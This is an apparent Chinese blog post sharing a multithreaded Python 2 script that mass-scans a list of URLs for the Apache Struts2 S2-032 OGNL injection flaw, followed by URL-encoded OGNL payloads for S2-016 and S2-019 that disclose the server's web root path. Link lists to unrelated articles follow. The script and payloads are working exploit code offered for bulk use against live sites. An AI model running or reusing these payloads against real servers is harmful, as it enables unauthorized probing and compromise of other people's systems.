看乌云上许多大牛上脚本,我也写个玩吧!写的比较简单。懒得优化,参数获取就自己改吧

需要抓很多struts,可用爱站工具包或则自己写个脚本爬

#coding:utf8

import urllib2

import re

import urlparse

import Queue

import threading

import mechanize

import cookielib

queue = Queue.Queue()

mutex = threading.Lock()

def find_title(url):

        try:

            br = mechanize.Browser()

            br.set_cookiejar(cookielib.LWPCookieJar()) # Cookie jar

            br.set_handle_equiv(True) # Browser Option

            br.set_handle_redirect(True)

            br.set_handle_referer(True)

            br.set_handle_robots(False)

            br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

            br.open(url)

            t = br.title().decode('utf-8').encode('gb2312')

            return t

        except Exception,e:

                return ''

def s2_status():

    global number

    while True:

        if queue.empty():

            break

        url = queue.get()

        data = "method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23matt%3D%23attr.get(%23parameters.command%5B0%5D)%2C%23matt.getWriter().println(3345*2356)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%2C1%3F%23xx%3A%23request.toString&command=com.opensymphony.xwork2.dispatcher.HttpServletResponse"

        html,status = url_open(url,data)

        if status == '' and re.search(r'',html):

            mutex.acquire()

            print url+"     "+find_title(url)+"   s2-032  "+str(number)

            mutex.release()

        number = number + 1

        #else:

            #print "no"

def url_open(url,data):

    headers={

        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"

                    #"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

                    #"Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",

                    #"Accept-Encoding": "gzip, deflate",

                    #"If-Modified-Since": "Tue, 03 Dec 2010 08:25:11 GMT",

                    #"Cache-Control": "max-age=0"

        }

    try:

        req = urllib2.Request(url,data,headers = headers)

        html = urllib2.urlopen(req,timeout=3).read()

        ret = ''

        return html,ret

    except urllib2.HTTPError, e:

        return '',e.code

    except:

        return '',''   

#------------------------------------------------------------

if __name__ == "__main__":

    global number

    number = 1

    with open('action.txt','r') as f:

        url = f.readline()

        while url:

            queue.put(str(url))

            url = f.readline()

        print queue.qsize()

    threads = []

    for i in range(500):

        t = threading.Thread(target=s2_status)

        t.start()

        threads.append(t)

    for t in threads:

        t.join()

    print 'All Done!'

简单去重,由于数量少,就没考虑溢出

import re

with open('1.txt','r') as f:

    txt = f.read()

    #print txt

url = re.findall(r'(http://.*?)\|',txt)

url = set(url)

for i in url:

    with open('result.txt','a+') as f:

        f.write(i.strip()+"\n")

效果图

16,19poc

data_32 = "method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23matt%3D%23attr.get(%23parameters.command%5B0%5D)%2C%23matt.getWriter().println(7880820)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%2C1%3F%23xx%3A%23request.toString&command=com.opensymphony.xwork2.dispatcher.HttpServletResponse"

    data_16 = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path7880820:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"

    data_19 = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path7880820:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"

s2-032批量脚本的更多相关文章

  1. salt-ssh的批量脚本及使用方法

    author: headsen   chen date : 2018-08-02   20:06:06 1,salt-ssh的安装: yum -y install epel-release yum - ...

  2. ssh 信任关系无密码登陆,清除公钥,批量脚本

    实验机器: 主机a:192.168.2.128 主机b:192.168.2.130 实验目标: 手动建立a到b的信任关系,实现在主机a通过 ssh 192.168.2.130不用输入密码远程登陆b主机 ...

  3. ant-jmeter批量脚本

    <?xml version="1.0"?> <project name="autotest" default="all" ...

  4. IISPUT 批量脚本的编写

    import requests import re import sys header = { "Accept":"text/javascript, applicatio ...

  5. PHP代码格式化批量脚本

    @echo off echo please input phpCB url: set /p input= cd /d "E:\tools\phpCB\" phpCB --space ...

  6. thinkphp5.0.*命令执行批量脚本

    import requests import Queue import threading import time user_agent = "Mozilla/5.0 (Windows NT ...

  7. php 批量脚本检测语法错误

    shell 根据参数检测 当前php项目下 的语法错误 #!/bin/bash function getdir(){ for el in `ls $1` do dir_file=$1"/&q ...

  8. SQL Server中中数据行批量插入脚本的存储实现

        看到博友SQL Server MVP桦仔的一篇博文“将表里的数据批量生成INSERT语句的存储过程的实现”.我仔细看来博文中的两个存储代码,自我感觉两个都不太满意,都是生成的单行模式的插入,数 ...

  9. cacti批量添加主机脚本

    #!/bin/bash ##cacti批量脚本位置 device=/var/www/html/cacti/cli/add_device.php graphs=/var/www/html/cacti/c ...

随机推荐

  1. spring六种种依赖注入方式

    平常的java开发中,程序员在某个类中需要依赖其它类的方法,则通常是new一个依赖类再调用类实例的方法,这种开发存在的问题是new的类实例不好统一管理,spring提出了依赖注入的思想,即依赖类不由程 ...

  2. mysql 与 oracle 比较(一)group by 容易产生的误解

    注:本文并不是列举出两者之间的所有不同,而是在实际应用中发现的不同的功能点或者处理模式,之所以记录下来,就是为了提醒自己,勿忘 group by : (1)oracle 中,总所周知,select ( ...

  3. simtrace之探秘SIM卡中的世界

    0×00 关于SIM卡 众所周知SIM卡是一张插在手机上的小卡,其全称为Subscriber Identity Module 客户识别模块.不过,这个世界上并没有多少人知道SIM卡中的操作系统是基于j ...

  4. 国产单机RPG游戏的情怀

    最近在玩儿仙剑奇侠传5,这个游戏从小时候玩儿到现在,也算是见证了一代人的成长,小时候没少玩盗版,现在自己工作了,有了固定的收入,也能体会到游戏开发者的不容易,尤其是单机游戏这个圈子,现在国内几乎没有人 ...

  5. ES6:模块简单解释

    modules是ES6引入的最重要的一个特性. 以后写模块的时候就直接按照ES6的modules语法来写 ,然后用babel+browserify 来打包就行了. modules规范分两部分,一部分是 ...

  6. false等于0???

    看到一个函数strpos($string,$str),用于在字符串$string中查找$str,如果在$string中查找到$str,则返回第一次出现的位置,起始位置为0:如果$string中不包含$ ...

  7. 14、C#基础整理(函数)

    函数 1.概念:是一个带有输入参数.输出参数.返回值的代码块. 2.写法: 修饰符  返回值类型  函数名(输入参数,输入参数) { 方法段 return 返回值; } 3.注释: (1)输入参数格式 ...

  8. Autoresizing和AutoLayout

    1 使用Autoresizing的方式进行界面布局 1.1 问题 Autoresizing是IOS旧版的自动布局技术,现在仍然被很多企业使用.本案例将学习如何使用Autoresizing完成界面的布局 ...

  9. JavaScript 阶段总结

  10. 有k个list列表, 各个list列表的元素是有序的,将这k个列表元素进行排序( 基于堆排序的K路归并排序)

    解题思路: 排序方法:多路归并排序 每次将n个list的头元素取出来,进行排序(堆排序),最小元素从堆中取出后,将其所在list的下一个元素 放入堆中,调整堆序列. 函数实现原型: void list ...